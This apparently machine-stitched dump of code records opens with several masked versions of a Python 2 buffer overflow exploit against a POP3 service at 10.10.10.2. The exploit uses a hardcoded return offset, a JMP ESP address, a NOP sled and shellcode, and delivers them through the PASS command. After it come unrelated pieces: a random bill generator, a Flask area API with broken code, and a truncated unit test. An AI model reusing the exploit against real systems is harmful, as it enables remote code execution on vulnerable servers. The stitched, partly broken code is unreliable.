"step-2": "<mask token>\ns.connect((RHOST, RPORT))\n<mask token>\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\n<mask token>\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\n<mask token>\ns.send('USER username' + '\\r\\n')\n<mask token>\ns.send('PASS ' + buf + '\\r\\n')\n<mask token>\ns.close\n",
"step-3": "<mask token>\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-4": "import socket\nimport struct\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-5": "#!/usr/bin/env python2\n\nimport socket\nimport struct\n\nRHOST = \"10.10.10.2\"\nRPORT = 110\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\n\n# OFFSETS\n# EIP 4654\n# ESP 342\n# EBP 4650\n# jmp_esp in slmfc.dll at 5f4a358f\njmp_esp = 0x5f4a358f\nnop_sled = \"\\x90\" * 32\n\nbuf_totlen = 5000\noffset_srp = 4654\n\nshellcode_calc = b\"\"\nshellcode_calc += b\"\\xba\\xd5\\x90\\xd2\\x7d\\xdb\\xd5\\xd9\\x74\\x24\"\nshellcode_calc += b\"\\xf4\\x58\\x31\\xc9\\xb1\\x36\\x31\\x50\\x13\\x83\"\nshellcode_calc += b\"\\xe8\\xfc\\x03\\x50\\xda\\x72\\x27\\x81\\x0c\\xf0\"\nshellcode_calc += b\"\\xc8\\x7a\\xcc\\x95\\x41\\x9f\\xfd\\x95\\x36\\xeb\"\nshellcode_calc += b\"\\xad\\x25\\x3c\\xb9\\x41\\xcd\\x10\\x2a\\xd2\\xa3\"\nshellcode_calc += b\"\\xbc\\x5d\\x53\\x09\\x9b\\x50\\x64\\x22\\xdf\\xf3\"\nshellcode_calc += b\"\\xe6\\x39\\x0c\\xd4\\xd7\\xf1\\x41\\x15\\x10\\xef\"\nshellcode_calc += b\"\\xa8\\x47\\xc9\\x7b\\x1e\\x78\\x7e\\x31\\xa3\\xf3\"\nshellcode_calc += b\"\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80\"\nshellcode_calc += b\"\\x04\\x38\\x4c\\xb9\\x0c\\x22\\x91\\x84\\xc7\\xd9\"\nshellcode_calc += b\"\\x61\\x72\\xd6\\x0b\\xb8\\x7b\\x75\\x72\\x75\\x8e\"\nshellcode_calc += b\"\\x87\\xb2\\xb1\\x71\\xf2\\xca\\xc2\\x0c\\x05\\x09\"\nshellcode_calc += b\"\\xb9\\xca\\x80\\x8a\\x19\\x98\\x33\\x77\\x98\\x4d\"\nshellcode_calc += b\"\\xa5\\xfc\\x96\\x3a\\xa1\\x5b\\xba\\xbd\\x66\\xd0\"\nshellcode_calc += b\"\\xc6\\x36\\x89\\x37\\x4f\\x0c\\xae\\x93\\x14\\xd6\"\nshellcode_calc += b\"\\xcf\\x82\\xf0\\xb9\\xf0\\xd5\\x5b\\x65\\x55\\x9d\"\nshellcode_calc += b\"\\x71\\x72\\xe4\\xfc\\x1f\\x85\\x7a\\x7b\\x6d\\x85\"\nshellcode_calc += b\"\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8e\\x69\\x4a\\xda\"\nshellcode_calc += b\"\\xeb\\x96\\xa8\\xcf\\x01\\x3f\\x75\\x9a\\xa8\\x22\"\nshellcode_calc += b\"\\x86\\x70\\xee\\x5a\\x05\\x71\\x8e\\x98\\x15\\xf0\"\nshellcode_calc += b\"\\x8b\\xe5\\x91\\xe8\\xe1\\x76\\x74\\x0f\\x56\\x76\"\nshellcode_calc += b\"\\x5d\\x61\\x3d\\xfc\\x7e\\x0b\\xce\\x99\\x0c\\xd3\"\nshellcode_calc += b\"\\x1f\\x03\\x95\\x77\\x7f\\xa5\\x34\\x13\\x1a\\x09\"\nshellcode_calc += b\"\\xd1\\x82\\x8f\\x2c\\x2f\\x35\\x2e\\xdc\\x3c\\xb5\"\n\nbuf = \"\"\nbuf += \"A\" * (offset_srp - len(buf))\nbuf += struct.pack(\"<I\", jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += \"D\"*(buf_totlen - len(buf))\n\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
l_store_id = random.randint(1, 4)
now = datetime.datetime.now()
l_bill_id = now.strftime('%Y%m%d%H%M%S')
start_date = datetime.date(2000, 1, 1)
end_date = datetime.date(2020, 1, 1)
time_between_dates = end_date - start_date
days_between_dates = time_between_dates.days
random_number_of_days = random.randrange(days_between_dates)
l_date = start_date + datetime.timedelta(days=random_number_of_days)
l_bill_details = {}
for i in range(random.randint(1, 25)):
l_prod_id = random.randint(1, 25)
l_qty = random.randint(1, 20)
l_bill_details[l_prod_id] = l_qty
l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':
l_date, 'bill_details': l_bill_details}
print(l_data)
new_file = open(l_target_path + l_bill_id + '.json', 'w')
new_file.write(str(l_data))
new_file.close()
time.sleep(3)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
l_target_path = 'E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/'
while True:
l_store_id = random.randint(1, 4)
now = datetime.datetime.now()
l_bill_id = now.strftime('%Y%m%d%H%M%S')
start_date = datetime.date(2000, 1, 1)
end_date = datetime.date(2020, 1, 1)
time_between_dates = end_date - start_date
days_between_dates = time_between_dates.days
random_number_of_days = random.randrange(days_between_dates)
l_date = start_date + datetime.timedelta(days=random_number_of_days)
l_bill_details = {}
for i in range(random.randint(1, 25)):
l_prod_id = random.randint(1, 25)
l_qty = random.randint(1, 20)
l_bill_details[l_prod_id] = l_qty
l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':
l_date, 'bill_details': l_bill_details}
print(l_data)
new_file = open(l_target_path + l_bill_id + '.json', 'w')
new_file.write(str(l_data))
new_file.close()
time.sleep(3)
<|reserved_special_token_1|>
import random
import datetime
import os
import time
import json
l_target_path = 'E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/'
while True:
l_store_id = random.randint(1, 4)
now = datetime.datetime.now()
l_bill_id = now.strftime('%Y%m%d%H%M%S')
start_date = datetime.date(2000, 1, 1)
end_date = datetime.date(2020, 1, 1)
time_between_dates = end_date - start_date
days_between_dates = time_between_dates.days
random_number_of_days = random.randrange(days_between_dates)
l_date = start_date + datetime.timedelta(days=random_number_of_days)
l_bill_details = {}
for i in range(random.randint(1, 25)):
l_prod_id = random.randint(1, 25)
l_qty = random.randint(1, 20)
l_bill_details[l_prod_id] = l_qty
l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':
l_date, 'bill_details': l_bill_details}
print(l_data)
new_file = open(l_target_path + l_bill_id + '.json', 'w')
new_file.write(str(l_data))
new_file.close()
time.sleep(3)
<|reserved_special_token_1|>
import random
import datetime
import os
import time
import json
#
l_target_path = "E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/"
while True:
l_store_id = random.randint(1, 4)
now = datetime.datetime.now()
l_bill_id = now.strftime("%Y%m%d%H%M%S")
# Generate Random Date
start_date = datetime.date(2000, 1, 1)
end_date = datetime.date(2020, 1, 1)
time_between_dates = end_date - start_date
days_between_dates = time_between_dates.days
random_number_of_days = random.randrange(days_between_dates)
l_date = start_date + datetime.timedelta(days=random_number_of_days)
l_bill_details = {}
for i in range(random.randint(1, 25)):
l_prod_id = random.randint(1,25)
l_qty = random.randint(1,20)
l_bill_details[l_prod_id] = l_qty
l_data = { "bill_id":l_bill_id
,"store_id":l_store_id
,"bill_date":l_date
,"bill_details":l_bill_details}
print(l_data) #json.dumps(l_data)
new_file = open(l_target_path + l_bill_id + ".json", "w")
new_file.write(str(l_data))
new_file.close()
time.sleep(3)
|
flexible
|
{
"blob_id": "fad2ad89e4d0f04fad61e27048397a5702870ca9",
"index": 6177,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n l_store_id = random.randint(1, 4)\n now = datetime.datetime.now()\n l_bill_id = now.strftime('%Y%m%d%H%M%S')\n start_date = datetime.date(2000, 1, 1)\n end_date = datetime.date(2020, 1, 1)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n l_date = start_date + datetime.timedelta(days=random_number_of_days)\n l_bill_details = {}\n for i in range(random.randint(1, 25)):\n l_prod_id = random.randint(1, 25)\n l_qty = random.randint(1, 20)\n l_bill_details[l_prod_id] = l_qty\n l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':\n l_date, 'bill_details': l_bill_details}\n print(l_data)\n new_file = open(l_target_path + l_bill_id + '.json', 'w')\n new_file.write(str(l_data))\n new_file.close()\n time.sleep(3)\n",
"step-3": "<mask token>\nl_target_path = 'E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/'\nwhile True:\n l_store_id = random.randint(1, 4)\n now = datetime.datetime.now()\n l_bill_id = now.strftime('%Y%m%d%H%M%S')\n start_date = datetime.date(2000, 1, 1)\n end_date = datetime.date(2020, 1, 1)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n l_date = start_date + datetime.timedelta(days=random_number_of_days)\n l_bill_details = {}\n for i in range(random.randint(1, 25)):\n l_prod_id = random.randint(1, 25)\n l_qty = random.randint(1, 20)\n l_bill_details[l_prod_id] = l_qty\n l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':\n l_date, 'bill_details': l_bill_details}\n print(l_data)\n new_file = open(l_target_path + l_bill_id + '.json', 'w')\n new_file.write(str(l_data))\n new_file.close()\n time.sleep(3)\n",
"step-4": "import random\nimport datetime\nimport os\nimport time\nimport json\nl_target_path = 'E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/'\nwhile True:\n l_store_id = random.randint(1, 4)\n now = datetime.datetime.now()\n l_bill_id = now.strftime('%Y%m%d%H%M%S')\n start_date = datetime.date(2000, 1, 1)\n end_date = datetime.date(2020, 1, 1)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n l_date = start_date + datetime.timedelta(days=random_number_of_days)\n l_bill_details = {}\n for i in range(random.randint(1, 25)):\n l_prod_id = random.randint(1, 25)\n l_qty = random.randint(1, 20)\n l_bill_details[l_prod_id] = l_qty\n l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':\n l_date, 'bill_details': l_bill_details}\n print(l_data)\n new_file = open(l_target_path + l_bill_id + '.json', 'w')\n new_file.write(str(l_data))\n new_file.close()\n time.sleep(3)\n",
"step-5": "import random\nimport datetime\nimport os\nimport time\nimport json\n\n#\nl_target_path = \"E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/\"\n\n\nwhile True:\n\n l_store_id = random.randint(1, 4)\n now = datetime.datetime.now()\n l_bill_id = now.strftime(\"%Y%m%d%H%M%S\")\n\n\n # Generate Random Date\n start_date = datetime.date(2000, 1, 1)\n end_date = datetime.date(2020, 1, 1)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n\n l_date = start_date + datetime.timedelta(days=random_number_of_days)\n\n l_bill_details = {}\n\n for i in range(random.randint(1, 25)):\n\n l_prod_id = random.randint(1,25)\n l_qty = random.randint(1,20)\n l_bill_details[l_prod_id] = l_qty\n\n l_data = { \"bill_id\":l_bill_id\n ,\"store_id\":l_store_id\n ,\"bill_date\":l_date\n ,\"bill_details\":l_bill_details}\n \n print(l_data) #json.dumps(l_data)\n\n new_file = open(l_target_path + l_bill_id + \".json\", \"w\")\n new_file.write(str(l_data))\n new_file.close()\n\n\n time.sleep(3)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Area(Resource):
<|reserved_special_token_0|>
pareser.add_argument('name', type=str, required=True, help=
'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
<|reserved_special_token_0|>
class AreaList(Resource):
@jwt_required()
def get(self):
return list[map(lambda x: x.json() for x in StoreMode.query.all())]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Area(Resource):
<|reserved_special_token_0|>
pareser.add_argument('name', type=str, required=True, help=
'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self, name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message': "Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return list[map(lambda x: x.json() for x in StoreMode.query.all())]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Area(Resource):
pareser = reqparse.RequestParser()
pareser.add_argument('name', type=str, required=True, help=
'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self, name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message': "Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return list[map(lambda x: x.json() for x in StoreMode.query.all())]
<|reserved_special_token_1|>
from model.area import AreaModel
from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
class Area(Resource):
pareser = reqparse.RequestParser()
pareser.add_argument('name', type=str, required=True, help=
'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self, name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message': "Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return list[map(lambda x: x.json() for x in StoreMode.query.all())]
<|reserved_special_token_1|>
from model.area import AreaModel
from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
class Area(Resource):
pareser = reqparse.RequestParser()
pareser.add_argument('name',
type = str,
required = True,
help = 'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self,name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message':"Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return(list[map(lambda x: x.json() for x in StoreMode.query.all())])
|
flexible
|
{
"blob_id": "4dcc0261abdb783c60471736567faf7db8b56190",
"index": 9548,
"step-1": "<mask token>\n\n\nclass Area(Resource):\n <mask token>\n pareser.add_argument('name', type=str, required=True, help=\n 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n\n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n <mask token>\n\n\nclass AreaList(Resource):\n\n @jwt_required()\n def get(self):\n return list[map(lambda x: x.json() for x in StoreMode.query.all())]\n",
"step-2": "<mask token>\n\n\nclass Area(Resource):\n <mask token>\n pareser.add_argument('name', type=str, required=True, help=\n 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n\n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n\n @jwt_required()\n def delete(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n area.delete()\n return {'message': \"Area with name '{}' deleted\".format(name)}, 204\n else:\n return {'message': 'Wrong area name provided'}, 404\n\n\nclass AreaList(Resource):\n\n @jwt_required()\n def get(self):\n return list[map(lambda x: x.json() for x in StoreMode.query.all())]\n",
"step-3": "<mask token>\n\n\nclass Area(Resource):\n pareser = reqparse.RequestParser()\n pareser.add_argument('name', type=str, required=True, help=\n 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n\n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n\n @jwt_required()\n def delete(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n area.delete()\n return {'message': \"Area with name '{}' deleted\".format(name)}, 204\n else:\n return {'message': 'Wrong area name provided'}, 404\n\n\nclass AreaList(Resource):\n\n @jwt_required()\n def get(self):\n return list[map(lambda x: x.json() for x in StoreMode.query.all())]\n",
"step-4": "from model.area import AreaModel\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\n\n\nclass Area(Resource):\n pareser = reqparse.RequestParser()\n pareser.add_argument('name', type=str, required=True, help=\n 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n\n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n\n @jwt_required()\n def delete(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n area.delete()\n return {'message': \"Area with name '{}' deleted\".format(name)}, 204\n else:\n return {'message': 'Wrong area name provided'}, 404\n\n\nclass AreaList(Resource):\n\n @jwt_required()\n def get(self):\n return list[map(lambda x: x.json() for x in StoreMode.query.all())]\n",
"step-5": "from model.area import AreaModel\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\n\nclass Area(Resource):\n pareser = reqparse.RequestParser()\n pareser.add_argument('name', \n type = str,\n required = True,\n help = 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n \n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n\n @jwt_required()\n def delete(self,name):\n area = AreaModel.search_area_byname(name)\n if area:\n area.delete()\n return {'message':\"Area with name '{}' deleted\".format(name)}, 204\n else:\n return {'message': 'Wrong area name provided'}, 404\n\nclass AreaList(Resource):\n @jwt_required()\n def get(self):\n return(list[map(lambda x: x.json() for x in StoreMode.query.all())])",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import os
import shutil
import numpy as np
import unittest
from lsst.ts.wep.Utility import FilterType, runProgram
from lsst.ts.wep.WepController import WepController
from lsst.ts.wep.ctrlIntf.RawExpData import RawExpData
from lsst.ts.aoclcSim.Utility import getModulePath
from lsst.ts.aoclcSim.WepCmpt import WepCmpt
class TestWepCmpt(unittest.TestCase):
""" Test the WepCmpt class."""
def setUp(self):
self.outputDir = os.path.join(getModulePath(), "tests", "tmp")
self._makeDir(self.outputDir)
isrDirName = "input"
isrDir = os.path.join(self.outputDir, isrDirName)
self._makeDir(isrDir)
self.wepCmpt = WepCmpt(isrDir)
# Set the survey paramters
self.wepCmpt.setFilter(FilterType.REF)
self.wepCmpt.setBoresight(0.0, 0.0)
self.wepCmpt.setRotAng(0.0)
def _makeDir(self, newDir):
os.makedirs(newDir, exist_ok=True)
def tearDown(self):
self.wepCmpt.disconnect()
shutil.rmtree(self.outputDir)
def testGetWepController(self):
wepCntlr = self.wepCmpt.getWepController()
self.assertTrue(isinstance(wepCntlr, WepController))
def testGetFilter(self):
filterType = self.wepCmpt.getFilter()
self.assertEqual(filterType, FilterType.REF)
def testSetFilter(self):
filterType = FilterType.R
self.wepCmpt.setFilter(filterType)
self.assertEqual(self.wepCmpt.getFilter(), filterType)
def testGetBoresight(self):
raInDeg, decInDeg = self.wepCmpt.getBoresight()
self.assertEqual(raInDeg, 0.0)
self.assertEqual(decInDeg, 0.0)
def testSetBoresight(self):
raInDeg = 10.0
decInDeg = 20.0
self.wepCmpt.setBoresight(raInDeg, decInDeg)
